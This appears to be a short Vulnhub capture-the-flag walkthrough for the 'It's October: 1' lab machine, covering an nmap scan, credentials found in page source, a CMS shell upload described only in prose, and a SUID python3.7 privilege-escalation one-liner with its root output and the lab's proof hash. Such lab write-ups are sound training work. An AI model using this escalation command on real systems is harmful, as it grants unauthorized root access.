IT’S OCTOBER: 1 | Vulnhub Walkthrough

Its a another easy level machine of Vulnhub

Goal: Get the root flag of the target.

Difficulty: Easy/Medium Level

Lab Setup:-

Now Lets find the IP of machine.

Here is my machine IP 192.168.1.205

Scanning:-

┌──(danial㉿kali)-[~/Desktop/InfosecWarrior/Its_October]
└─$ nmap -sV -sC -v -A -oA nmap -p- 192.168.1.205

Got 4 Open ports 22, 80, 3306 and 8080.

Let’s move forward with port 80

Nothing Special got a simple html template after running dirb and gobuster found only admin directory.

Leave it as of now and move forward with port 8080

got a custom page, After reviewing souce code got some creds.

Now let’s login to the cms

Now time to upload a shell.

After spending 2–3 hours got method to upload a shell, Tried with plugin method als but not worked.

Now we got a shell

After running find command got someting that attracts to me.

So i decided to move forward with python3.7

So finally got a method to root machine.

bash-5.0$ /usr/bin/python3.7 -c 'import os; os.execl("/bin/sh", "sh", "-p")'
/usr/bin/python3.7 -c 'import os; os.execl("/bin/sh", "sh", "-p")'
# id
id
uid=33(www-data) gid=33(www-data) euid=0(root) groups=33(www-data)
# whoami
whoami
root
# cd /root
cd /root
# ls
ls
proof.txt
# cat proof.txt
cat proof.txt
Best of Luck
$2y$12$EUztpmoFH8LjEzUBVyNKw.9AKf37uZWPxJp.A3eop2ff0LbLYZrFq

Finally Got a root !!

Happy Hacking.